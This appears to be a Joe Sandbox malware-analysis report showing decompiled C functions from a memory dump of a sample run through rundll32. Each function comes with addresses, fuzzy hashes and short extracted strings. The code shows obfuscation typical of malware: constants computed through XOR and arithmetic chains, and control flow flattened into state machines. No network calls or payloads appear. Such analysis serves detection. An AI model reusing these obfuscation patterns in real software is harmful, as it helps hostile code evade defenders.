Opcode Fuzzy Hash: 47afd95250530385e6c1ff70f7cb0bd824665528d1b1afa175986317301c5085
Instruction Fuzzy Hash: F5519471008341AFD799CF61C98981BBAE6FBC8708F004A0DF29542260C7B5CA29CF97

Uniqueness

Uniqueness Score: -1.00%

Function 001F9AE1, Relevance: 6.4, Strings: 5, Instructions: 133
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E001F9AE1(signed int __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v72;
				intOrPtr _v76;
				void* _t124;
				signed int _t130;
				signed int _t132;
				signed int _t133;
				intOrPtr* _t145;
				intOrPtr* _t148;
				intOrPtr* _t150;
				void* _t155;
				void* _t156;

				_t132 = __ecx;
				_t148 =  *0x211400; // 0x0
				while(_t148 != 0) {
					if( *_t148 != 0) {
						 *((intOrPtr*)(_t148 + 0x1c))( *_t148, 0xb, 0);
					}
					_t148 =  *((intOrPtr*)(_t148 + 0x10));
				}
				_t133 = _t132 | 0xffffffff;
				_pop(_t149);
				_t156 = _t155 - 0x40;
				_v8 = 0x42f0c0;
				_t130 = _t133;
				_v4 = 0;
				_v32 = 0x6e16;
				_t145 = 0x211400;
				_v32 = _v32 * 0x5a;
				_v32 = _v32 ^ 0x0026feb4;
				_v36 = 0x8b1c;
				_v36 = _v36 | 0xe0bb5784;
				_v36 = _v36 ^ 0xe0bbe7d8;
				_v44 = 0xb12;
				_v44 = _v44 ^ 0x7b8ee909;
				_v44 = _v44 >> 4;
				_v44 = _v44 ^ 0x07b8dae4;
				_v60 = 0xab64;
				_v60 = _v60 + 0xffff1f21;
				_v60 = _v60 ^ 0x0d405f68;
				_v60 = _v60 ^ 0x2b3fedb8;
				_v60 = _v60 ^ 0xd98056b3;
				_v64 = 0x7bd7;
				_v64 = _v64 * 0x50;
				_v64 = _v64 >> 8;
				_v64 = _v64 << 0xb;
				_v64 = _v64 ^ 0x0135cdcf;
				_v16 = 0xecab;
				_v16 = _v16 * 0x2d;
				_v16 = _v16 ^ 0x0029a0af;
				_v40 = 0xc18d;
				_v40 = _v40 + 0x35cc;
				_v40 = _v40 + 0x172a;
				_v40 = _v40 ^ 0x00011856;
				_v20 = 0xa565;
				_v20 = _v20 | 0x765f3394;
				_v20 = _v20 ^ 0x765fa4be;
				_v24 = 0xe1b9;
				_v24 = _v24 * 0x49;
				_v24 = _v24 ^ 0x00405f3b;
				_v48 = 0x2e03;
				_v48 = _v48 + 0xf77b;
				_v48 = _v48 ^ 0x50a91f1d;
				_v48 = _v48 ^ 0x34247e68;
				_v48 = _v48 ^ 0x648c5df0;
				_v12 = 0x6cf0;
				_v12 = _v12 + 0x5895;
				_v12 = _v12 ^ 0x0000ed40;
				_v52 = 0x996c;
				_v52 = _v52 + 0xd3f;
				_v52 = _v52 << 0xa;
				_v52 = _v52 ^ 0x4e95cfbf;
				_v52 = _v52 ^ 0x4c0f105b;
				_v56 = 0xb088;
				_v56 = _v56 + 0xffff7048;
				_v56 = _v56 >> 5;
				_v56 = _v56 * 0x1f;
				_v56 = _v56 ^ 0x00001ffc;
				_v28 = 0xa4f1;
				_v28 = _v28 + 0xacd;
				_v28 = _v28 ^ 0x0000afbe;
				_t150 =  *0x211400; // 0x0
				while(_t150 != 0) {
					if( *_t150 == 0) {
						L10:
						 *_t145 =  *((intOrPtr*)(_t150 + 0x10));
						_t124 = E001F91CD(_v48, _v12, _v52, _t150, _v56);
						_t156 = _t156 + 0xc;
					} else {
						_t124 = E00207CBC(_v32,  *((intOrPtr*)(_t150 + 4)), _t130, _v36);
						if(_t124 != _v28) {
							_t117 = _t150 + 0x10; // 0x10
							_t145 = _t117;
						} else {
							 *((intOrPtr*)(_t150 + 0x1c))( *_t150, 0, 0);
							E00208C8B(_v56, _v72, _v76,  *_t150);
							E001F78F0( *((intOrPtr*)(_t150 + 4)), _v28, _v52, _v32, _v36);
							_t156 = _t156 + 0x14;
							goto L10;
						}
					}
					_t150 =  *_t145;
				}
				return _t124;
			}

0x001f9ae1
0x001f9ae2
0x001f9afb
0x001f9aed
0x001f9af5
0x001f9af5
0x001f9af8
0x001f9af8
0x001f9aff
0x001f9b02
0x00201e45
0x00201e48
0x00201e54
0x00201e56
0x00201e5a
0x00201e69
0x00201e6e
0x00201e72
0x00201e7a
0x00201e82
0x00201e8a
0x00201e92
0x00201e9a
0x00201ea2
0x00201ea7
0x00201eaf
0x00201eb7
0x00201ebf
0x00201ec7
0x00201ecf
0x00201ed7
0x00201ee4
0x00201ee8
0x00201eed
0x00201ef2
0x00201efa
0x00201f07
0x00201f0b
0x00201f13
0x00201f1b
0x00201f23
0x00201f2b
0x00201f33
0x00201f3b
0x00201f43
0x00201f4b
0x00201f58
0x00201f5c
0x00201f64
0x00201f6c
0x00201f74
0x00201f7c
0x00201f84
0x00201f8c
0x00201f94
0x00201f9c
0x00201fa4
0x00201fac
0x00201fb4
0x00201fb9
0x00201fc1
0x00201fc9
0x00201fd1
0x00201fd9
0x00201fe3
0x00201fe7
0x00201fef
0x00201ff7
0x00201fff
0x00202007
0x00202081
0x00202011
0x00202061
0x00202075
0x00202077
0x0020207c
0x00202013
0x0020201f
0x0020202a
0x0020208d
0x0020208d
0x0020202c
0x00202030
0x00202041
0x00202059
0x0020205e
0x00000000
0x0020205e
0x0020202a
0x0020207f
0x0020207f
0x0020208c

Strings

;_@, xrefs: 00201F5C
@, xrefs: 00201F9C
h~$4, xrefs: 00201F7C
h_@, xrefs: 00201EBF
?, xrefs: 00201FAC

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ;_@$?$@$h_@$h~$4
API String ID: 0-1313548790
Opcode ID: a0d0ef3dd7aa1ec9d3614aeea7b8cd0ef35a11e6449d8f16ce1ddfa32ee71405
Instruction ID: 4bf3701f0d841553ec81f0e76b68736e6c3b87b438cc06e9caf36ea7af896ccc
Opcode Fuzzy Hash: a0d0ef3dd7aa1ec9d3614aeea7b8cd0ef35a11e6449d8f16ce1ddfa32ee71405
Instruction Fuzzy Hash: 5B611D71508342CFE3A8CF21C48944BFBF1BB94B58F504E1DF596A62A0C3B59A59CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00299055, Relevance: 6.4, Strings: 5, Instructions: 133COMMON

Download Yara Rule

Strings

h~$4, xrefs: 002A14F0
;_@, xrefs: 002A14D0
?, xrefs: 002A1520
@, xrefs: 002A1510
h_@, xrefs: 002A1433

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ;_@$?$@$h_@$h~$4
API String ID: 0-1313548790
Opcode ID: 19c60eb2fc9d772e2184e1397d5d84d04df9bbe5c21165f98c8c15ce99fbaf5a
Instruction ID: 94666692e64c82f170c3d41f6489ab4bd8c6c2c6c12db06d0dce48959846c9a0
Opcode Fuzzy Hash: 19c60eb2fc9d772e2184e1397d5d84d04df9bbe5c21165f98c8c15ce99fbaf5a
Instruction Fuzzy Hash: 88614F71408341CFE758CF21C48940BFBF1BB84768F604E1DF5A6A62A0C7B59A59CF86

Uniqueness

Uniqueness Score: -1.00%

Function 001F7605, Relevance: 6.4, Strings: 5, Instructions: 127
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E001F7605() {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t110;
				void* _t118;
				signed int _t120;
				signed int _t135;
				signed int _t136;
				short* _t137;
				signed int* _t140;

				_t140 =  &_v568;
				_v524 = _v524 & 0x00000000;
				_v528 = 0x1387ac;
				_t118 = 0x4e41429;
				_v552 = 0x9cc8;
				_v552 = _v552 * 0xb;
				_v552 = _v552 | 0x98122ffa;
				_v552 = _v552 ^ 0x9816c8f2;
				_v548 = 0xc79b;
				_v548 = _v548 << 5;
				_v548 = _v548 >> 6;
				_v548 = _v548 ^ 0x00001472;
				_v560 = 0x2de7;
				_t135 = 0xb;
				_v560 = _v560 / _t135;
				_v560 = _v560 >> 0xf;
				_v560 = _v560 | 0x0a536918;
				_v560 = _v560 ^ 0x0a532199;
				_v536 = 0x89b4;
				_v536 = _v536 + 0xffff0cb8;
				_v536 = _v536 ^ 0xffffc1bc;
				_v532 = 0xdd21;
				_v532 = _v532 + 0xb061;
				_v532 = _v532 ^ 0x0001daa7;
				_v564 = 0x77e3;
				_t136 = 0x1c;
				_v564 = _v564 * 0x76;
				_v564 = _v564 << 0xc;
				_v564 = _v564 + 0xffff5cda;
				_v564 = _v564 ^ 0x74296bf4;
				_v556 = 0x240d;
				_t110 = _v556 / _t136;
				_v556 = _t110;
				_v556 = _v556 + 0xcc42;
				_v556 = _v556 >> 7;
				_v556 = _v556 ^ 0x00001fe6;
				_v544 = 0x5b3d;
				_v544 = _v544 + 0xffffa256;
				_v544 = _v544 ^ 0xffff9726;
				_t137 = _v544;
				_v540 = 0x5d73;
				_v540 = _v540 + 0xffff95f2;
				_v540 = _v540 ^ 0xffff9ed1;
				L1:
				while(_t118 != 0x2493963) {
					if(_t118 == 0x4e41429) {
						_t118 = 0x2493963;
						continue;
					}
					if(_t118 == 0x95c6af5) {
						return E00205891(_t137,  *0x2121b0 + 0x10, _v556, _v544, _v540);
					}
					if(_t118 != 0x1ce20f0e) {
						L15:
						__eflags = _t118 - 0x278615fa;
						if(__eflags != 0) {
							continue;
						}
						return _t110;
					}
					_v568 = 0x3f77;
					_v568 = _v568 ^ 0x040fc81f;
					_t120 = 0x71;
					_v568 = _v568 / _t120;
					_v568 = _v568 >> 4;
					_v568 = _v568 ^ 0x00009342;
					_t137 =  &_v520 + E0020BBAB(_v536, _v532,  &_v520, _v564) * 2;
					while(1) {
						_t110 =  &_v520;
						if(_t137 <= _t110) {
							break;
						}
						__eflags =  *_t137 - 0x5c;
						if( *_t137 != 0x5c) {
							L8:
							_t137 = _t137 - 2;
							__eflags = _t137;
							continue;
						}
						_t94 =  &_v568;
						 *_t94 = _v568 - 1;
						__eflags =  *_t94;
						if( *_t94 == 0) {
							__eflags = _t137;
							L12:
							_t118 = 0x95c6af5;
							goto L1;
						}
						goto L8;
					}
					goto L12;
				}
				_t110 = E001F8C0C(_v552, __eflags, _v548, _v560,  &_v520);
				_t140 =  &(_t140[3]);
				_t118 = 0x1ce20f0e;
				goto L15;
			}

0x001f7605
0x001f760b
0x001f7612
0x001f761a
0x001f761f
0x001f7630
0x001f7639
0x001f7646
0x001f7653
0x001f765b
0x001f7660
0x001f7665
0x001f766d
0x001f767b
0x001f7680
0x001f7686
0x001f768b
0x001f7693
0x001f769b
0x001f76a3
0x001f76ab
0x001f76b3
0x001f76bb
0x001f76c3
0x001f76cb
0x001f76d8
0x001f76d9
0x001f76dd
0x001f76e2
0x001f76ea
0x001f76f2
0x001f76fe
0x001f7700
0x001f7704
0x001f770c
0x001f7711
0x001f7719
0x001f7721
0x001f7729
0x001f7731
0x001f7735
0x001f773d
0x001f7745
0x00000000
0x001f774d
0x001f775b
0x001f77e1
0x00000000
0x001f77e1
0x001f7763
0x00000000
0x001f782d
0x001f776b
0x001f7803
0x001f7803
0x001f7809
0x00000000
0x00000000
0x00000000
0x001f7809
0x001f7771
0x001f777b
0x001f7789
0x001f778c
0x001f7794
0x001f7799
0x001f77b9
0x001f77cd
0x001f77cd
0x001f77d3
0x00000000
0x00000000
0x001f77be
0x001f77c2
0x001f77ca
0x001f77ca
0x001f77ca
0x00000000
0x001f77ca
0x001f77c4
0x001f77c4
0x001f77c4
0x001f77c8
0x001f77d7
0x001f77da
0x001f77da
0x00000000
0x001f77da
0x00000000
0x001f77c8
0x00000000
0x001f77d5
0x001f77f9
0x001f77fe
0x001f7801
0x00000000

Strings

w?, xrefs: 001F7771
$, xrefs: 001F76F2
=[, xrefs: 001F7719
w, xrefs: 001F76CB
s], xrefs: 001F7735

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $$=[$s]$w?$w
API String ID: 0-3700477970
Opcode ID: 5c0740410e110791f370fedd258af57061f5c02b9e15342c99aac724fa03a9d7
Instruction ID: d7dc73e3c7b4c661a251968ae57d34a13c4ca9d7312303e9119f8cd6ad0e3280
Opcode Fuzzy Hash: 5c0740410e110791f370fedd258af57061f5c02b9e15342c99aac724fa03a9d7
Instruction Fuzzy Hash: 7D516A7150C342DFD354DF25D44942FBBE1BBD4758F104A1EF296662A0D3B49A49CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00296B79, Relevance: 6.4, Strings: 5, Instructions: 127COMMON

Download Yara Rule

Strings

w, xrefs: 00296C3F
$, xrefs: 00296C66
=[, xrefs: 00296C8D
w?, xrefs: 00296CE5
s], xrefs: 00296CA9

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $$=[$s]$w?$w
API String ID: 0-3700477970
Opcode ID: 277707674fd162f44101cd3fa0c9065e11ac009da9a69dc25550b4755c06a648
Instruction ID: e063eaa05f9ed0ad21bacfd2af6d9e5e9ac72e9df38f13bb417fb90450006599
Opcode Fuzzy Hash: 277707674fd162f44101cd3fa0c9065e11ac009da9a69dc25550b4755c06a648
Instruction Fuzzy Hash: 7D5187715183429FDB54CF25D84941FBBF1FBC4358F104A1EF1A6A62A0D3B49A59CF82

Uniqueness

Uniqueness Score: -1.00%

Function 001F94EC, Relevance: 5.2, Strings: 4, Instructions: 209
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E001F94EC() {
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				short* _t218;
				void* _t223;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t270;
				void* _t272;

				_t272 = (_t270 & 0xfffffff8) - 0x258;
				_v552 = 0xc5de;
				_v552 = _v552 << 0xb;
				_t223 = 0x10e191ba;
				_v552 = _v552 * 0xa;
				_v552 = _v552 ^ 0x3dd55649;
				_v528 = 0xd7a0;
				_v528 = _v528 ^ 0xb5a30bcc;
				_v528 = _v528 ^ 0xb5a3bef7;
				_v576 = 0xa7dd;
				_v576 = _v576 << 0xe;
				_t258 = 0x27;
				_v576 = _v576 / _t258;
				_v576 = _v576 ^ 0x011311a2;
				_v588 = 0x76f2;
				_v588 = _v588 | 0xcad6357e;
				_v588 = _v588 ^ 0x58bbddc5;
				_v588 = _v588 ^ 0x926db7d7;
				_v604 = 0x542d;
				_v604 = _v604 ^ 0xdabf7200;
				_v604 = _v604 | 0x518ac0ce;
				_v604 = _v604 + 0xffff5d7d;
				_v604 = _v604 ^ 0xdbbf6591;
				_v536 = 0x6f2;
				_v536 = _v536 ^ 0xb7ff586a;
				_v536 = _v536 ^ 0xb7ff59fe;
				_v564 = 0x9bc0;
				_t259 = 0x60;
				_v564 = _v564 * 0x77;
				_v564 = _v564 + 0xffff74e2;
				_v564 = _v564 ^ 0x0047e104;
				_v556 = 0xec1b;
				_v556 = _v556 * 0x26;
				_v556 = _v556 >> 3;
				_v556 = _v556 ^ 0x0004652b;
				_v568 = 0x50db;
				_v568 = _v568 / _t259;
				_v568 = _v568 << 8;
				_v568 = _v568 ^ 0x0000bb9e;
				_v540 = 0x45e;
				_t260 = 0x2a;
				_v540 = _v540 / _t260;
				_v540 = _v540 ^ 0x00003856;
				_v600 = 0xdcf5;
				_v600 = _v600 >> 0xb;
				_t261 = 0x55;
				_v600 = _v600 / _t261;
				_v600 = _v600 + 0xffff3d4e;
				_v600 = _v600 ^ 0xffff3115;
				_v544 = 0xeb2c;
				_v544 = _v544 | 0xbe9f19ff;
				_v544 = _v544 ^ 0xbe9ffb48;
				_v560 = 0x6b9e;
				_v560 = _v560 | 0x0e8ada92;
				_v560 = _v560 + 0xfffff2fa;
				_v560 = _v560 ^ 0x0e8af134;
				_v572 = 0xb259;
				_v572 = _v572 ^ 0x7ea6fcad;
				_v572 = _v572 * 0x50;
				_v572 = _v572 ^ 0x93f8b0e2;
				_v596 = 0x3f12;
				_t262 = 0x14;
				_v596 = _v596 * 0x3e;
				_v596 = _v596 | 0x39de80ab;
				_v596 = _v596 + 0x6fd8;
				_v596 = _v596 ^ 0x39e00adb;
				_v548 = 0xf59e;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 ^ 0x00004a18;
				_v532 = 0xef88;
				_v532 = _v532 / _t262;
				_v532 = _v532 ^ 0x00005e97;
				_v580 = 0xce2c;
				_t263 = 0x1d;
				_v580 = _v580 * 0x38;
				_v580 = _v580 / _t263;
				_v580 = _v580 ^ 0x00019ca1;
				_v584 = 0xcb97;
				_t264 = 0x7c;
				_v584 = _v584 * 0x5a;
				_v584 = _v584 * 0x11;
				_v584 = _v584 ^ 0x04c0b349;
				_v592 = 0xb13f;
				_v592 = _v592 / _t264;
				_v592 = _v592 * 0x6b;
				_v592 = _v592 | 0xb06a3ec2;
				_v592 = _v592 ^ 0xb06acb10;
				do {
					while(_t223 != 0xd11567f) {
						if(_t223 == 0xdefeb70) {
							_push(0x1f1000);
							_push(_v576);
							E002063BF(E0020BF25(_v552, _v528, __eflags), __eflags, _v604, _v536,  &_v524,  *0x2121b0 + 0x234, _v564,  *0x2121b0 + 0x234,  *0x2121b0 + 0x10, _v556);
							_t218 = E0020C5F7(_v568, _v540, _v600, _v544, _t215);
							_t272 = _t272 + 0x2c;
							_t223 = 0x285c1f68;
							continue;
						} else {
							if(_t223 == 0x10e191ba) {
								_t223 = 0xdefeb70;
								continue;
							} else {
								if(_t223 == 0x285c1f68) {
									_t218 = E001F1E13(_v560, _v572, _v596, _v548,  &_v524);
									_t272 = _t272 + 0xc;
									 *_t218 = 0;
									_t223 = 0xd11567f;
									continue;
								}
							}
						}
						goto L9;
					}
					E001F4EA1( &_v524, _v532, _v580, _v584,  &_v524, E00207570, _v592, 0);
					_t272 = _t272 + 0x18;
					_t223 = 0x1084920c;
					L9:
					__eflags = _t223 - 0x1084920c;
				} while (__eflags != 0);
				return _t218;
			}

0x001f94f2
0x001f94f8
0x001f9502
0x001f9507
0x001f9515
0x001f9519
0x001f9521
0x001f9529
0x001f9531
0x001f9539
0x001f9541
0x001f954c
0x001f9551
0x001f9557
0x001f955f
0x001f9567
0x001f956f
0x001f9577
0x001f957f
0x001f9587
0x001f958f
0x001f9597
0x001f959f
0x001f95a7
0x001f95af
0x001f95b7
0x001f95bf
0x001f95cc
0x001f95cf
0x001f95d3
0x001f95db
0x001f95e3
0x001f95f0
0x001f95f4
0x001f95f9
0x001f9601
0x001f9611
0x001f9615
0x001f961a
0x001f9622
0x001f962e
0x001f9633
0x001f9639
0x001f9641
0x001f9649
0x001f9652
0x001f9655
0x001f9659
0x001f9661
0x001f9669
0x001f9671
0x001f9679
0x001f9681
0x001f9689
0x001f9691
0x001f9699
0x001f96a1
0x001f96a9
0x001f96b6
0x001f96bc
0x001f96c9
0x001f96e2
0x001f96e5
0x001f96e9
0x001f96f1
0x001f96f9
0x001f9701
0x001f9709
0x001f970e
0x001f9716
0x001f9726
0x001f972a
0x001f9732
0x001f973f
0x001f9742
0x001f974e
0x001f9752
0x001f975a
0x001f9767
0x001f9768
0x001f9771
0x001f9775
0x001f977d
0x001f978b
0x001f9794
0x001f9798
0x001f97a0
0x001f97a8
0x001f97a8
0x001f97b2
0x001f97f2
0x001f97f7
0x001f9839
0x001f984f
0x001f9854
0x001f9857
0x00000000
0x001f97b4
0x001f97ba
0x001f97ee
0x00000000
0x001f97bc
0x001f97c2
0x001f97dd
0x001f97e2
0x001f97e7
0x001f97ea
0x00000000
0x001f97ea
0x001f97c2
0x001f97ba
0x00000000
0x001f97b2
0x001f987f
0x001f9884
0x001f9887
0x001f9889
0x001f9889
0x001f9889
0x001f9898

Strings

,, xrefs: 001F9669
-T, xrefs: 001F957F
V8, xrefs: 001F9639
p, xrefs: 001F96D1

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,$-T$V8$p
API String ID: 0-3916372523
Opcode ID: 5333437582b53bf61b280e0cd1cbab020084fd4a37564279b24e3c1a28c84cf6
Instruction ID: 2c8052dc8608ccbc9674a1822d8fa242f04f1a43a97484d61086c0626eff3296
Opcode Fuzzy Hash: 5333437582b53bf61b280e0cd1cbab020084fd4a37564279b24e3c1a28c84cf6
Instruction Fuzzy Hash: 5EA152701093419FD358DF26D98A81BFBF1FBC5718F40891DF6A69A2A0D3B59909CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00298A60, Relevance: 5.2, Strings: 4, Instructions: 209COMMON

Download Yara Rule

Strings

,, xrefs: 00298BDD
-T, xrefs: 00298AF3
p, xrefs: 00298C45
V8, xrefs: 00298BAD

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,$-T$V8$p
API String ID: 0-3916372523
Opcode ID: fd9b0b0c2c09042a7e85890a9ff51ec2ffa16a5b0e2e2bb9116817bf484f6cfe
Instruction ID: 11e21d6ddd31395a41fcda3c345996f6d17706e2bb4142e1c5f064c1f89b5ea4
Opcode Fuzzy Hash: fd9b0b0c2c09042a7e85890a9ff51ec2ffa16a5b0e2e2bb9116817bf484f6cfe
Instruction Fuzzy Hash: 75A152701193419FD358DF26D88681BFBF1FBC5718F10891DF2A69A2A0D7B59A09CF82

Uniqueness

Uniqueness Score: -1.00%

Function 002077C0, Relevance: 5.1, Strings: 4, Instructions: 142
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E002077C0(signed int __ecx, intOrPtr* __edx) {
				char _v520;
				signed int _v524;
				signed int _v528;
				unsigned int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				intOrPtr _t112;
				intOrPtr _t115;
				signed int _t117;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				void* _t124;
				signed int _t136;
				void* _t137;
				signed int _t140;
				intOrPtr* _t143;
				signed int* _t144;

				_t144 =  &_v564;
				_v532 = 0x1772;
				_v532 = _v532 * 0x5a;
				_t143 = __edx;
				_v532 = _v532 >> 9;
				_v532 = _v532 ^ 0x00005570;
				_t120 = __ecx;
				_v536 = 0xd4de;
				_t137 = 0xee39a7c;
				_v536 = _v536 + 0xf33a;
				_v536 = _v536 ^ 0x38a2f836;
				_v536 = _v536 ^ 0x38a37f8b;
				_v548 = 0x7513;
				_v548 = _v548 | 0x052e2a6a;
				_v548 = _v548 ^ 0x1a009472;
				_v548 = _v548 ^ 0x1f2ec1f2;
				_v524 = 0xa699;
				_v524 = _v524 ^ 0x09ca44e2;
				_v524 = _v524 ^ 0x09cad658;
				_v564 = 0x9128;
				_v564 = _v564 >> 2;
				_v564 = _v564 << 9;
				_v564 = _v564 | 0x50e7f59d;
				_v564 = _v564 ^ 0x50ef90e4;
				_v556 = 0x80f2;
				_v556 = _v556 >> 0xb;
				_v556 = _v556 ^ 0x31791c1d;
				_v556 = _v556 + 0x8ae1;
				_v556 = _v556 ^ 0x3179d51e;
				_v540 = 0x4387;
				_t122 = 0x3f;
				_v540 = _v540 / _t122;
				_v540 = _v540 ^ 0x58e2e29e;
				_v540 = _v540 ^ 0x58e2cc49;
				_v552 = 0xa082;
				_v552 = _v552 ^ 0xcad17016;
				_v552 = _v552 + 0xffff4873;
				_v552 = _v552 ^ 0x78230127;
				_v552 = _v552 ^ 0xb2f23b2e;
				_v528 = 0x3f9f;
				_t123 = 0x42;
				_v528 = _v528 / _t123;
				_v528 = _v528 ^ 0x00000484;
				_t136 = _v528;
				_v560 = 0x7d41;
				_v560 = _v560 << 4;
				_v560 = _v560 * 0x2b;
				_v560 = _v560 >> 0xf;
				_v560 = _v560 ^ 0x00006e49;
				_v544 = 0x2431;
				_v544 = _v544 ^ 0x7eed52f8;
				_v544 = _v544 | 0x8f6fe496;
				_v544 = _v544 ^ 0xffefc65f;
				while(_t137 != 0x5fcbc3f) {
					if(_t137 != 0xee39a7c) {
						if(_t137 == 0x11ea9c68) {
							_push( &_v520);
							_t117 = E001F2628(_t120, _t143);
							asm("sbb esi, esi");
							_t123 = 0x1f1318;
							_t140 =  ~_t117 & 0x1fda4e6f;
							goto L7;
						} else {
							if(_t137 == 0x1790ebe1) {
								return E001F91CD(_v552, _v528, _v560, _t136, _v544);
							}
							_t151 = _t137 - 0x376b3a50;
							if(_t137 != 0x376b3a50) {
								L12:
								__eflags = _t137 - 0x7fc7711;
								if(__eflags != 0) {
									continue;
								} else {
									return _t117;
								}
								L16:
							} else {
								_push(_v540);
								_push(0);
								_push(0);
								_push(_t123);
								_push(_v556);
								_push(_v564);
								_t123 = _v548;
								_push( &_v520);
								_push(0);
								_t117 = E002089F6(_t123, _v524, _t151);
								_t144 =  &(_t144[8]);
								asm("sbb esi, esi");
								_t140 =  ~_t117 & 0xee6bd05e;
								L7:
								_t137 = _t140 + 0x1790ebe1;
								continue;
							}
						}
					}
					_t124 = 0x24;
					_t115 = E002057E8(_t124);
					_t136 = _t115;
					_t123 = _t123;
					__eflags = _t136;
					if(__eflags != 0) {
						_t137 = 0x11ea9c68;
						continue;
					}
					return _t115;
					goto L16;
				}
				 *((intOrPtr*)(_t136 + 0x20)) = _t120;
				_t137 = 0x7fc7711;
				_t112 =  *0x211400; // 0x0
				 *((intOrPtr*)(_t136 + 0x10)) = _t112;
				 *0x211400 = _t136;
				goto L12;
			}

0x002077c0
0x002077c6
0x002077d7
0x002077db
0x002077dd
0x002077e4
0x002077ec
0x002077ee
0x002077f6
0x002077fb
0x00207803
0x0020780b
0x00207813
0x0020781b
0x00207823
0x0020782b
0x00207833
0x0020783b
0x00207843
0x0020784b
0x00207853
0x00207858
0x0020785d
0x00207865
0x0020786d
0x00207875
0x0020787a
0x00207882
0x0020788a
0x00207892
0x002078a0
0x002078a5
0x002078ab
0x002078b3
0x002078bb
0x002078c3
0x002078cb
0x002078d3
0x002078db
0x002078e3
0x002078ef
0x002078f2
0x002078f6
0x002078fe
0x00207902
0x0020790a
0x00207914
0x00207918
0x0020791d
0x00207925
0x0020792d
0x00207935
0x0020793d
0x00207945
0x00207957
0x0020795f
0x002079bb
0x002079c3
0x002079cd
0x002079cf
0x002079d0
0x00000000
0x00207961
0x00207967
0x00000000
0x00207a34
0x0020796d
0x00207973
0x00207a10
0x00207a10
0x00207a16
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00207979
0x00207979
0x00207981
0x00207983
0x00207985
0x00207986
0x0020798a
0x00207992
0x00207996
0x00207997
0x00207999
0x0020799e
0x002079a5
0x002079a7
0x002079ad
0x002079ad
0x00000000
0x002079ad
0x00207973
0x0020795f
0x002079e3
0x002079e4
0x002079e9
0x002079eb
0x002079ec
0x002079ee
0x002079f0
0x00000000
0x002079f0
0x00207a41
0x00000000
0x00207a41
0x002079fa
0x002079fd
0x00207a02
0x00207a07
0x00207a0a
0x00000000

Strings

1$, xrefs: 00207925
pU, xrefs: 002077E4
In, xrefs: 0020791D
P:k7, xrefs: 0020796D

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1$$In$P:k7$pU
API String ID: 0-2106264963
Opcode ID: a10795b6ba630564cfe3395ff1ad3698fc1408f8188cf891101de7ef4f20ca89
